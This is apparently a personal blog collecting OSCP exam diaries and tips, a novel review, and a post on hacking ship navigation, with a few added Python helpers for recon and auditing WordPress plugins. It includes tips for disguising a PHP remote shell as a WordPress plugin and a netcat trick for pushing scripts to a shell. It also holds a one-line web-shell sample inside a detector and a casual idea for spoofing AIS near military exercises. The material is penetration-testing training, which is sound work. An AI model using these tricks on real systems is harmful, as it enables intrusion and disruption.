OSCP: The chain to loot

So you want to be a super evil pirate ninja leet hax0r??

Well, it seems so, because even after I finished my OSCP I still get DMs in the OSCP forums and even direct emails along the lines of “Well my exam is tomorrow .. plz help”.

So you want the evil super s3crät l00t? Then you need to know the super s3cr3t secret:

 

The Exploit chain.

The chain consists of the following links:

  • The exploit
  • The recon
  • The delivery
  • The payload
  • The receiver

Let’s talk about the individual pieces of the chain, shall we?

The exploit

Well, everybody is always crazed out about these super evil 0days.

So you are a super script kiddie who got a mad super s3crit exploit from his friends in that dark IRC channel and now owns 1000 shells around the world. Great, could you please step into that corner over there? Great .. so you are the super pro NSA hacker with his pre-packed EternalBlue exploit .. great, step into the corner too … Ohh, so you are one of those elitist guys from the offsec IRC preaching that using Metasploit is bad and only handcrafted manual exploits from your grandma are the real deal .. well, you know where the corner is.

We don’t care about the exploit in this article .. because if you master the rest of the chain, the exploit is the least important piece of all. It is the weakest link of our chain. An exploit can and will fail; after all you are using a buffer overflow or some other bug in your target’s software, so you are quite likely to crash or break something. If the rest of your chain is not solid, well .. no shell for you.

The recon

Let’s use a Lego analogy again: You say you want a Lego brick. Great, which of the 51k possible different types do you want? https://www.bricklink.com/catalogTree.asp?itemType=P&itemBrand=1000 That is the reason why I made so much fun of the exploit part: imagine how many different configurations an international company with offices around the globe has? I bet more than an easy 51k possible versions 😉 So any extra information you can get makes the job easier. If you say a gray piece, I could ask you which type of gray https://www.bricklink.com/catalogColors.asp?utm_content=subnav light bluish gray, dark gray, light gray etc etc 😉 Any information about the age of the piece? Because different years had different types of gray (just like a Windows or Linux OS has a release date, so if you know the version of, say, IIS or Apache you can tell which OS is the most likely one). PROTIP: Make a list of Apache, IIS, Windows and Linux versions and their release dates. Quite handy now and then.

You can get more precise of course: if you say slope 2×1 with a 2/3 cutout in light bluish gray .. well, we are in business. Same with a precise version number of a piece of software. It makes finding the right exploit easier. Or finding all hidden pages on a webserver, or even the Tomcat administration interface with the default password. Good precise recon is the key to a good chain to a shell. Any information you can present in a structured way makes your chain stronger.
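As an added example (my own Python, not code from the post), here is a small helper for the PROTIP above: it parses HTTP Server banners into structured recon records (product, version, OS hint, add-on modules) and annotates them with a release date and likely OS generation from a small lookup table. The table rows are a starting set the reader should extend from the vendors' release histories, and the sample banners are constructed.

```python
import re
from typing import Dict, List

# Starting rows for the "versions and release dates" list; extend from vendor changelogs.
# Key: (product, version) -> (release date, OS generation it usually ships with)
RELEASE_HINTS: Dict[tuple, tuple] = {
    ("Apache", "2.2.22"): ("2012-01", "Ubuntu 12.04 / Debian 7"),
    ("Apache", "2.4.7"): ("2013-11", "Ubuntu 14.04"),
    ("Apache", "2.4.18"): ("2015-12", "Ubuntu 16.04"),
    ("Microsoft-IIS", "6.0"): ("2003", "Windows Server 2003"),
    ("Microsoft-IIS", "7.5"): ("2009", "Windows Server 2008 R2 / Windows 7"),
    ("Microsoft-IIS", "8.5"): ("2013", "Windows Server 2012 R2"),
    ("Microsoft-IIS", "10.0"): ("2016", "Windows Server 2016 / Windows 10"),
}

# "Product/version" tokens as they appear in a Server: header, e.g. "Apache/2.4.7"
TOKEN_RE = re.compile(r"([A-Za-z][\w.-]*)/(\d[\w.-]*)")
# A parenthesised OS hint, e.g. "(Ubuntu)" or "(Win32)"
OS_HINT_RE = re.compile(r"\(([^)]*)\)")


def parse_banner(banner: str) -> Dict[str, object]:
    """Split a Server: header into product, version, OS hint and extra components."""
    tokens = TOKEN_RE.findall(banner)
    if not tokens:
        raise ValueError(f"no product/version token in banner: {banner!r}")
    product, version = tokens[0]
    hint = OS_HINT_RE.search(banner)
    return {
        "product": product,
        "version": version,
        "os_hint": hint.group(1) if hint else None,
        # later tokens are add-on modules such as PHP/5.5.9 or OpenSSL/1.0.1f
        "components": [f"{p}/{v}" for p, v in tokens[1:]],
    }


def annotate(record: Dict[str, object]) -> Dict[str, object]:
    """Attach release date and likely OS generation from the table, if known."""
    hint = RELEASE_HINTS.get((record["product"], record["version"]))
    record["released"] = hint[0] if hint else None
    record["likely_os"] = hint[1] if hint else None
    return record


def recon_table(hosts: Dict[str, str]) -> List[Dict[str, object]]:
    """Turn {host: banner} into structured rows; unparsable banners are kept as raw text."""
    rows = []
    for host, banner in hosts.items():
        try:
            row = annotate(parse_banner(banner))
        except ValueError:
            row = {"product": None, "version": None, "os_hint": None,
                   "components": [], "released": None, "likely_os": None}
        row["host"] = host
        row["raw"] = banner
        rows.append(row)
    return rows


# Constructed sample banners (not taken from any real target)
SAMPLE_BANNERS = {
    "10.0.0.5": "Apache/2.2.22 (Ubuntu)",
    "10.0.0.6": "Microsoft-IIS/7.5",
    "10.0.0.7": "Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f",
    "10.0.0.8": "nginx/1.10.3 (Ubuntu)",
    "10.0.0.9": "Server",  # hidden or garbage banner
}

if __name__ == "__main__":
    for row in recon_table(SAMPLE_BANNERS):
        print(f"{row['host']:<10} {row['product']}/{row['version']} "
              f"os_hint={row['os_hint']} released={row['released']} "
              f"likely_os={row['likely_os']} extra={row['components']}")
```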


The delivery

What do I mean by delivery? Well, you might have a cool RFI thing on that server you are attacking, but that does not help if you can’t debug your own webserver and make sure that that super evil payload is actually delivered to the target. Or if you don’t deactivate all scripting on your server you might get another shell than the one you expected. So make sure you can debug all the ways you want to deliver your payload to the target. Make sure you get through the upload filter, or that your payload has the right format to work in the website etc. Or that you have the right URL encoding for your SQL payload etc. Or if you use an exploit script you might want to check with wireshark or tcpdump that the exploit actually sends something to the target. Make sure that you can get the stuff you want on the target to the target. If you can’t ensure that, you can have the fanciest vulnerability on a server and it is useless if you can’t reach it.

The payload

Well, you have a fancy exploit but you left the default payload in it and now calc.exe is open on your target. Great work. You want to be able to pick the right payload for the target. Know what the difference between staged and unstaged (stageless) payloads is in msfvenom. If you are in the labs it might be a good idea to spend time with a working exploit in Metasploit and try every payload on the target. Make a list of which payload works best on which OS. Which ports work most of the time because they are open on most firewalls? Know how to debug a payload, or use the payload to ping all the open ports etc. Make sure you can verify that a payload is working. Juggling too many unknowns is a disaster. Have you ever tried to solve a math problem with 5 unknowns? It is harder than solving y=2. Just saying that you should also be able to make sure that you can pick the right payload and the right port to connect back to you, and be generally able to debug your payload.

The receiver

Well, the receiving part is a chain link which is often overlooked by many people. But think about it: it would be really shameful if your firewall killed the incoming shell … wouldn’t it? So you should be able to debug your end of the connection. Also it is common to try to catch an encrypted payload connection with nc. It can be done, but not with the default settings you might expect. There is a reason why I set up msf exploit/multi/handler for every payload. This way I have one thing all the time that I can practice and debug, and a proven method of handling my shells without fear of nc crashing on the first attempt and me forgetting to restart it again etc.

So that was my introduction to the magic chain to the loot.

As usual feel free to give me feedback.

Greetings ucki

Book Review Ayden‘s Choice (Nele Vonlanthen Book 1)

Now to something totally different .. a book review.

First a TRIGGER WARNING: If you are a person who tends to be triggered, please don’t read the book or this review. Especially if you have problems with family violence and abuse. Really, don’t read on in this case.

Link to the Website of the book: http://www.nelevonlanthen.com/

Let’s start with a little disclaimer and then dive into the review. I got the book for free after I wrote that one of the comic panels on the twitter account of the book universe was not correct. I try to be honest while doing the review. I wouldn’t have bought the book; I normally read a lot, but not from first-time authors. I have had so many bad experiences with authors abandoning series or writing bad stuff. If you watch Shad’s video https://www.youtube.com/watch?v=XF6yysxS5z8 you see there are many ways to screw up a book.

Just go to amazon and look for free ebooks. I made two literature mistakes in my life: the first one was reading most of Anne Rice because our crew got the idea to choose one author and then get all the books for a deployment. The second one was grabbing a lot of free ebooks from amazon for my year of travel. So now I’m super picky with my reading. You could write a total „Mary Sue type“ of story, you know, the HERO is everything. You know, Dragon Ball style etc. Or if you are a fantasy author you could try to write EPIC. You know: „They rode their Blarf to the Gnarf to drink some Snayrf.“ Because riding horses and drinking beer is not epic enough. Or you can go the full Lord of the Rings style and frontload everything with some hundred pages of „world building“. Or you can have your epic story and not be able to get the epicness over to your reader. Which is a problem if you want to build an epic series. You have to hook people with the first book. And to be honest, how many first books of an author or a series are out there which are really good? I’m just rereading Terry Pratchett’s Discworld. To be honest he is my top 1 author. No questions asked. But the first „high fantasy“ books of the series are not really good.

Ayden‘s Choice is the first book in a world; if you look at the WEBSITE or on the twitter account you see that there are a lot of ideas still untold.

Sam Felix tried very hard to make a GOOD FIRST BOOK. And now I’m in a hard place. The book itself looks like a book for young adults / teenagers. Not too many pages, bigger font etc. Should I review it as a standalone young person’s book? Should I review it as a part of an imaginary 60-book series?

The writing and the pacing are good, which makes the book a good quick read, quite pleasing from the word crafting aspect. Not too much CYBER CYBER TECHNOBABBLE, ok a „Use the power of the net“ pseudo fantasy lingo here and there. No Mary Sue super hero, good flow. So reading the book is not hard even for a person like me who is not a native English speaker (who would have guessed, with that bad writing 😉 )

But unfortunately the story part is another beast.

Basically Ayden’s Choice is an introduction story to the „NELEVERSE“ and an origin story of Ayden. Like all the Batman and Spiderman stories you get a superhero origin story. With all the classical problems.

You might know Wasp? Well, Lisbeth Salander from „The Girl with the Dragon Tattoo“? You know, this super duper hacker, with the super bad family story coming out during the series? Just imagine all the family problems in one book. 2/3 of the book are basically family abuse. Yepp, just that, beating and all the other bad stuff. So reading that was unpleasant even as a hacker, just knowing persons from bad families and not having the problems myself. So as a setup good versus bad this works quite well, to be honest too well. Well, till the author had the idea to give the reader a glimpse into the mind of the villain. This works quite well if you have such an epic series like Game of Thrones. But unfortunately this is a short teenager book. So having to slog through 1/3 of the book with all the bad stuff happening just to get to the first action, just to have the villain crumbling because of that, is not very pleasant. So basic story: Ayden is in hell and the crew around Nele have to rescue him because he is also a hacker talent. And this is the point where the story exploded totally for me. I’m fine with slogging through an origin story even if it is such an unpleasant one. But to have such a super talented hacker crew (the author is trying to introduce them to us, super sleeper compartmentalized opsec galore crew, the social engineer is called deceptionalist) make such blunt errors hurts. They get their surveillance gear found, they never heard about signal proof bags (they are commodity hardware these days, RFID and mobile signal proof bags come in duffel size now), never heard about door locks, safe driving etc. Actually the book is 2/3 family violence and abuse and around 1/3 one of this elite crew trying to fix the problems they had because of some screw up, just to finish the book with a MacGuffin. And our hero leaves the book also looking like the last unforgiving asshole.
If you spread out the story across some books, like Ayden remembering his backstory now and then and having some flashbacks and problems etc, it would work. But in this way it is just hard and not very pleasant. Which is quite a pity. The writing etc is good, the idea, world and the comic are quite good. This has the chance to be better than the Tom Clancy “Net and Cyber” book series. You know, a realistic cool hacker book series. But because of this I really can’t recommend the book. Because I don’t know to whom. It is not a teenager book, not a hacker book etc. While I look forward to more comics and also other books of this universe, I think I can’t give it a 5 star review like the reviewers on amazon. Well, that’s all for the first book review on this blog.

The thing about hacking ships

In recent times we saw two major accidents in the US navy. Well, actually there were more, but the media picked up on two: http://edition.cnn.com/2017/08/21/politics/navy-ships-accidents/index.html

While accidents happen all the time (btw look for the signals, this is the pre-photoshopped version 😉 ), infosec twitter is full of OMG THE RUSSIANS HACKED GPS.

Let’s have a look here .. DISCLAIMER: I spent 12 years in the German navy doing IT security and administration. I have a lot of „look what I found .. why are you crying skipper?“ to my name. I will talk broadly. Security etc … Hacking ships now is more a hobby for me than a job. Some of my info might be a bit outdated or purposefully wrong …


A short introduction to navigational systems:

Most of you will have just a basic understanding of how a ship operates. Most ships have distinctive systems; as a simplification we will categorise systems into these function groups:

  • Going to places (machine SCADA systems etc)
  • Knowing where you are (ECDIS (chart system), GPS, other navigational aids)
  • Knowing where everybody else is (radar, AIS)
  • Living on that thing
  • Mission package (cruise ship systems or weapons etc)


And how hard is it to hack these types of systems?

For the machine SCADA stuff, well, it is super easy and we have proof of that (Stuxnet, @viss on twitter). Well, on a ship it is harder because we have no back channel and no permanent internet connection etc, but with a USB stick you could hack this.


System groups 4 & 5 we will disregard for now. We want to hack on a broad scope.


The navigational aids are interesting to hack. ECDIS are certified systems with a lot of known bugs; just look at this YouTube channel and try to spot all the old OS versions: https://www.youtube.com/channel/UCDKFMaBHOmpnc-q6bn7kShw

GPS on the other hand is HARD. Not because of the P(Y) encryption (btw no civilian signal, no P(Y), because of time dependencies, read up on wiki) but because of physics. Spoofing is quite time sensitive, so while it is easy in a lab setting (and some universities did tests on ships) you need to be close to your target to overpower the sat on the antenna. If you jam from far away (low angle) your spoofing might not work. And since most ships have more than one receiver and one antenna it is quite annoying to spoof with good reliability. Oh, and when you can spoof, why waste it on some lousy destroyers in peace time? Also low angle jamming would be picked up by electronic warfare systems with a good chance. And this would trigger an angry response of the kinetic type, so not the best idea.

If I COULD spoof GPS without being close to the receiver I would sit in my evil bunker and laugh about all the precision ammo flying past it in a war setting. Too valuable in this setting to waste it on some dead sailors. Even as a test .. just grab one of the many Predator drones as a sample. Drones malfunction all the time, so nobody would make a big fuss about it.

AIS and radar: well, radar hacking or jamming is a thing, called electronic warfare. So proven concept. And AIS is not encrypted or secure. You could imagine it more like a number plate transponder. Nothing fancy. If you want to cause trouble with it, just grab a sailboat, sail close to a military exercise area and spoof some ships with a wrong GPS track inside of the target area and watch them stop shooting. Nothing really hard. And while smugglers and military ships often operate without AIS, it makes them stand out like hell on a radar pic, because a blip without AIS information = suspect.


And what happened? Let’s look at http://gcaptain.com/uss-john-s-mccain-collision-ais-animation-shows-tankers-track-during-collision/ If I look at the damage pictures it looks like SOMEBODY tried to pass a high traffic area without looking left or right and without sending AIS because OPSEC .. so maritime jaywalking. Just my idea .. but if I have to choose between hacking (which is possible but a hassle) and some idiotic „macho man“ manoeuvre .. well, my bet is on idiots 😉

Scripting the OSCP exam and getting some offsec swag

So in the last blog I hinted at some other scripts. Now here is the full story:

Act 1: While I wrote my msfvenom wrapper a lot of people in our private chat group started to make jokes about my scripting and that I would write uckivenom, the next better Metasploit. And as chance would have it, my exam date was 02.05 .. so one day after April Fools’ Day .. mmm, let’s get to work. I wrote a little script muttering out nice random phrases and had some nice ASCII art.

Act 2: I started to hint at the script roughly a week before April Fools’ Day (and had 2 other guys put in the picture) so we started to build some interest.

Act 3: The owner of the private channel got word and started to freak out because he was fearing offsec

Act 4: The people knowing that it was just a troll started a little riot in our party chat to get me back.

Act 5: I be back

Act 6: I put the script on the offsec forums on April Fools’ Day. It was gone in 5 min (and I started to freak out, fearing a ban one day before the exam)

Act 7: The forum post was back after 2h and normal students started to get fooled.

Act 8: After passing my exam I went to twitter and some friends congratulated me ^^ I mentioned the script and muts got wind of it.

Act 9: Offsec swag !!!


OSCP and SPACESHIP – The final Review

Finally: SPAAAACCCEEESHIIIPP ahh yes and OSCP -Final Thoughts and review.

Ok guys, finally, after sitting on my shelf and collecting dust in the box for nearly 9 months, it was time for the SPACESHIP SPACESHIP SPACESHIP !!! I bought it shortly before I did my first exam try (left over stock .. quite rare) to motivate me. You know, saying to myself I will build it next week when I have my OSCP. Well, it didn’t work out that way. So last week I finally had the chance to build it.

So finally I have my certification. Let’s do the final review of the course. This will be a series of two blog posts. In this post I do the review and in the next one in the following days I will give an overview of the tools and cheat sheets I produced during my time in the labs.

So to the review:

First off, this certification is the one I’m most proud of. Not getting the naval officer qualifications to navigate warships (ok, that was a cool one) or my firefighter cert and other professional certifications. This cert is also the cert where I hated the experience most.

The point is, OffSec is not a teaching company. They are a pentesting company offering some pentesting training. If you pay a teaching company you will get people teaching you stuff, answering your questions, and with a bit of luck you will leave the course with a cert and maybe you will learn some valuable lessons.

To paint a different picture: If offsec offered swimming courses, they would drop you into a cold pool. In my first review I used the diving licence as a picture.

While I hate this type of teaching, I value the lab so much. The cold pool, so to say, is a very nice one.

And for the teaching, you have to learn for yourself. And I can only recommend getting some friends or other people around you (be it in real life or via the internet) to turn you in the right direction now and then. It might sound stupid but my new job helped. In our IT sec department we have one guy with OSCP and a bunch of people who failed to get it. This helps with the morale; after two failed attempts I was doubting myself. But realising that this cert is hard helped a lot.

Overall I LOVE THE LABS !!! I will resubscribe in the future to test and learn a bit more. And thanks to all the people cheering me up in real life and in the dark back rooms of the internet. Thanks a lot !!

Thanks offsec (and also thank you for giving me the nice chance to troll you back with a nice April Fools’ joke 😉 )


And if you go into the labs .. remember, here be dragons

#OSCP Turning your Backdoor in a WordPress Plugin

Just a quick one:

Imagine you own a WordPress and want to upload your remote PHP script as a nice fancy WordPress plugin. You know, just adding a feature the original installation doesn’t have. So you grab your trusty PHP remote shell script .. and WordPress hates it. Damn .. So how do we build a valid WordPress plugin?

  1. Open up your php script and add

/*
Plugin Name: WordPress.org Plugin
Plugin URI:  https://developer.wordpress.org/plugins/the-basics/
Description: Basic WordPress Plugin Header Comment
Version:     20160911
Author:      WordPress.org
Author URI:  https://developer.wordpress.org/
License:     GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/

to the start, then upload it

2. ??????

3. Profit


Easy ^^
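From the other side of the fence, an added example (my own Python, not code from the post or from WordPress): it reads plugin headers the way WordPress does (only the first 8 KiB, matching the same “Field:” line pattern) and flags files that carry the handbook’s boilerplate header quoted above, pass request input straight into an execution function, or never register a hook. The two sample plugin sources are constructed.

```python
import re
from typing import Dict, List

# Header fields WordPress reads from the start of a plugin file (first 8 KiB only)
HEADER_FIELDS = ["Plugin Name", "Plugin URI", "Description", "Version",
                 "Author", "Author URI", "License", "License URI"]
HEADER_BYTES = 8192

# Values from the developer-handbook example header quoted in the post
BOILERPLATE = {"Plugin Name": "WordPress.org Plugin",
               "Author": "WordPress.org",
               "Version": "20160911"}

# Execution sink fed straight from request input, e.g. system($_GET['cmd'])
SINK_RE = re.compile(
    r"\b(?:eval|system|exec|shell_exec|passthru|popen|proc_open|assert)\s*\(\s*"
    r"(?:base64_decode\s*\(\s*)?\$_(?:GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE)
HOOK_RE = re.compile(r"\badd_(?:action|filter|shortcode)\s*\(")


def parse_plugin_header(source: str) -> Dict[str, str]:
    """Extract 'Field: value' lines with the same pattern WordPress uses."""
    head = source[:HEADER_BYTES]
    found = {}
    for field in HEADER_FIELDS:
        m = re.search(r"^[ \t/*#@]*" + re.escape(field) + r":(.*)$",
                      head, re.MULTILINE | re.IGNORECASE)
        if m:
            found[field] = m.group(1).strip()
    return found


def audit_plugin(source: str) -> List[str]:
    """Return finding tags for one plugin file (an empty list means nothing odd)."""
    findings = []
    header = parse_plugin_header(source)
    if "Plugin Name" not in header:
        return ["no-plugin-header"]  # WordPress would not list it as a plugin at all
    boiler_hits = [k for k, v in BOILERPLATE.items() if header.get(k) == v]
    if boiler_hits:
        findings.append("boilerplate-header:" + ",".join(boiler_hits))
    if SINK_RE.search(source):
        findings.append("request-to-exec")
    if not HOOK_RE.search(source):
        findings.append("no-wordpress-hooks")  # a "plugin" that never plugs in
    return findings


# Constructed samples: the post's header glued onto a one-line shell, and a benign plugin
SAMPLE_BACKDOOR = """<?php
/*
Plugin Name: WordPress.org Plugin
Plugin URI:  https://developer.wordpress.org/plugins/the-basics/
Description: Basic WordPress Plugin Header Comment
Version:     20160911
Author:      WordPress.org
Author URI:  https://developer.wordpress.org/
License:     GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/
system($_GET['cmd']);
"""

SAMPLE_BENIGN = """<?php
/*
Plugin Name: Footer Note
Version:     1.0
Author:      Example Dev
*/
add_action('wp_footer', function () { echo '<p>note</p>'; });
"""

if __name__ == "__main__":
    for name, src in [("backdoor", SAMPLE_BACKDOOR), ("benign", SAMPLE_BENIGN)]:
        print(name, parse_plugin_header(src).get("Plugin Name"), audit_plugin(src))
```

Run it over every PHP file under wp-content/plugins to get one line of findings per file.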

OSCP Exam, Episode II

So how is an OSCP exam??

Well, as I blogged, I failed the first time. This time I was pretty sure that my chance was a solid 50:50. I still had some problems with web apps (being from an infrastructure / paper background). So let’s see how the day went (edited out the machine numbers etc from my notes).

I was super cool for the start .. my timeline (local time):

11:00 start , some trouble with the vm … 11:15 in the network


12:25 25 points (you might know which 25 points .. not spoiling)

13:22 first look at machine

14:00 finished first look on another machine


14:16 Start Look at another Machine

14:42 finished the first look on another machine (the lowest points “easy box“)

16:25 Did Rotation 1 on a machine

17:08 Rotation 1 on a machine, got local shell … cursed a lot because of local.txt

That moment you celebrate your local shell .. just to find no command line tool to get the contents of the local proof file to the screen for the screenshot … ARGGGGGHHH

17:45-18:35 eating out with my girl to get my head clear .. looking good, 35 points so far

19:32 Finished Rotation 1 on another machine

20:26 Rotation 2 on a machine

21:33 a Machine Rotation

21:45 short Lego building of http://zusammengebaut.com/wp-content/uploads/2017/01/lego-brickheadz-iron-man-41590.jpg to get the head clear

22:45 Rotation 2 on a machine

23:47 Derping around between machines

00:47 More Derping between machines -> local Shell on a medium box

45 points so far in 12.5 h

1:25 Priv Escalation Try on local shell a

2:10 Back to another machine

4:00 Stop derping on “easy box” .. easy machine is not easy

7:08 my notes getting blurry .. no cm gained …


around 9:00, 2h left, my girl gets up .. mood is down .. my VM starts to behave weird, the laptop is going to overheat and I can’t copy and paste any longer between host and Kali .. a lot of manual typing …

10:00 deciding to call it a fail and take some sleep

13:00 sending in the failed report to get some feedback for the reporting template .. better to know in advance if something is missing for the next try

13:15 trying to get the dead animal out of my mouth and eat something

14:00 deciding to go back to the laptop to attack the lab with my last 4 lab days

15:00 still derping around watching youtube and building https://c1.staticflickr.com/1/778/32753576282_9ab8cf03b9_b.jpg

16:41 now (Blog first draft)

realising that my idea to take better notes than in the first exam worked out 50% .. my handwriting still gets super bad with sleepiness .. a lot in my LaTeX report and x screenshots etc .. but it will not help me if I get the same machines again …

1.5 days later: Well, after some thought .. well, webapps broke my neck .. potentially; to be honest I didn’t find any bugs on some of the machines. And the other machines, to be honest, on a real world test I would put them at the back of my list. A normal company often has that one corpse in the cellar. You know, that XP system running your accounting software, or the NT server etc. In the lab you often have problems with compiling for older kernels .. well, in the exam I had .. as the Thai say: ”Same Same but Different”. Right now I’m also questioning my strategy of switching between machines often … https://www.youtube.com/watch?v=TkraRj8uAYQ .. well, might have some chats and will do the exam with a better SOP in the near future 😉

Greetings Ucki

Quick tip: NC listener for the lazy

Ok, you have a shell but you want to have some cool scripts on the target to get cracking .. well, till now I just made a bunch of files with echo „bla bla“ > script.txt and copy pasted them line by line … well

If you set up your nc like this:

cat wget.sh |nc -lvp 443

It will just pipe all those nice echo lines into your command shell. So you have your scripts on the target.

Doh … so much time wasted ..

cheers ucki

Back to the labs .. again . .7 months later

Hello everybody reading this blog .. yeah, I mean you .. you seem to be the only one .. so hello again ..

It has been 7 months. What have I done in that time?

Well, I failed my first OSCP exam.

Weak points: Windows priv escalation and exploits .. sort of.

Then I spent my time in a lot of hotel rooms, being a digital nomad of sorts because of the job. So I took a break from the labs. Right now I’m back in a place with better internet (it is easier to get good internet in some mountains in South America than in some fancy hotels) so I’m giving that course a new shot.

Whether I will redo my recon scripts .. I’m unsure. Right now my recon procedure is:

1) run unicornscan (so much faster .. and also a fast UDP scan)

2) Run nmap only against the found ports of the target.

3) Write a lot of stuff down .. pen and paper style.
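As an added example (my own Python, not one of the recon scripts from the post), here is glue for steps 1 and 2 of that procedure: it parses unicornscan’s result lines into records, dedupes them per host and protocol, and builds the nmap argv for step 2 with only the found ports. The column layout of unicornscan’s output is assumed from its default format, and the sample output below is constructed.

```python
import re
from typing import Dict, List, Tuple

# One unicornscan result line (layout assumed from its default output), e.g.
#   TCP open                     ssh[   22]         from 10.11.1.5  ttl 64
LINE_RE = re.compile(
    r"^(?P<proto>TCP|UDP)\s+open\s+(?P<service>\S+)\[\s*(?P<port>\d+)\]\s+from\s+(?P<host>\S+)")


def parse_unicornscan(output: str) -> List[Dict[str, object]]:
    """One record per 'open' line; progress and statistics lines are ignored."""
    records = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append({"proto": m["proto"], "port": int(m["port"]),
                            "service": m["service"], "host": m["host"]})
    return records


def ports_by_host(records: List[Dict[str, object]]) -> Dict[Tuple[str, str], List[int]]:
    """Group as {(host, proto): sorted unique ports}; a port reported twice counts once."""
    grouped: Dict[Tuple[str, str], set] = {}
    for r in records:
        grouped.setdefault((r["host"], r["proto"]), set()).add(r["port"])
    return {key: sorted(ports) for key, ports in grouped.items()}


def nmap_commands(records: List[Dict[str, object]]) -> List[List[str]]:
    """Step 2: one nmap argv per host and protocol, restricted to the found ports."""
    cmds = []
    for (host, proto), ports in ports_by_host(records).items():
        argv = ["nmap", "-sV"]
        if proto == "UDP":
            argv.append("-sU")  # UDP version scan needs -sU (and root)
        argv += ["-p", ",".join(str(p) for p in ports), host]
        cmds.append(argv)
    return cmds


# Constructed sample output; the repeated ssh line exercises the dedupe
SAMPLE_OUTPUT = """\
adding 10.11.1.5/32 mode `TCPscan' ports `1-65535' pps 300
using interface(s) tun0
TCP open                     ssh[   22]         from 10.11.1.5  ttl 64
TCP open                    http[   80]         from 10.11.1.5  ttl 64
TCP open                     ssh[   22]         from 10.11.1.5  ttl 64
TCP open                   https[  443]         from 10.11.1.5  ttl 64
UDP open                  domain[   53]         from 10.11.1.5  ttl 64
TCP open                   mysql[ 3306]         from 10.11.1.9  ttl 128
sender statistics 299.5 pps with 65535 packets sent total
"""

if __name__ == "__main__":
    for argv in nmap_commands(parse_unicornscan(SAMPLE_OUTPUT)):
        print(" ".join(argv))
```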

Ok, right now I’m actually doing a lot of work in LaTeX, because I do every exercise in the manual. Like every tiny one. Because some of those tiny bits broke my neck in the first try.

For LaTeX I use the listings package (lstlisting) for copy-pasting most of my outputs into my report (screenshots are nice, but for my long term usage a copy-paste ability is quite nice .. going back if you need to remember a certain command).

I’m using three colors to highlight stuff:

moredelim=**[is][\color{codechanged}]{**@}{@**},
moredelim=**[is][\color{myblue}]{***@}{@***},
moredelim=**[is][\color{mygreen}]{*@}{@*},

As you can see I can make a red “change marker” as requested by offsec with **@TEXT@**, or I can make blue or green comments easily. I use green for comments of an “official nature” while blue is for command line options and remarks for myself. If I decide not to include that text I might just turn it invisible 😉 you know, grey on grey.

Anyways, so much for now .. see you guys in the lab

Greetings ucki

Back to the labs – everything is awesome


I didn’t blog for a while. There are some reasons for that ….

First, I got a new job. Actually my first day was also my exam day. The original plan was to use my last money to take this course and hope for the best. The new job keeps me occupied, so I didn’t blog.

Second: I failed the exam. Well, I wanted to blog about the exam, but it is hard without spoiling stuff.

Third: I actually didn’t like the course … hated the “community” around it.

Today I took the plunge and returned to the labs.

And to sing the catchy Lego Movie Song: “EVERYTHING IS AWESOME”

Why did I go from being grumpy to being happy?? Well, actually g0tm1lk posted an AWESOME thread in the forums about methodology.

And I was introduced to the OWASP framework while working. So right now I have 2 good procedures to learn from. Nice.

And my way to work actually passes the LEGO shop ^^

So just sing along …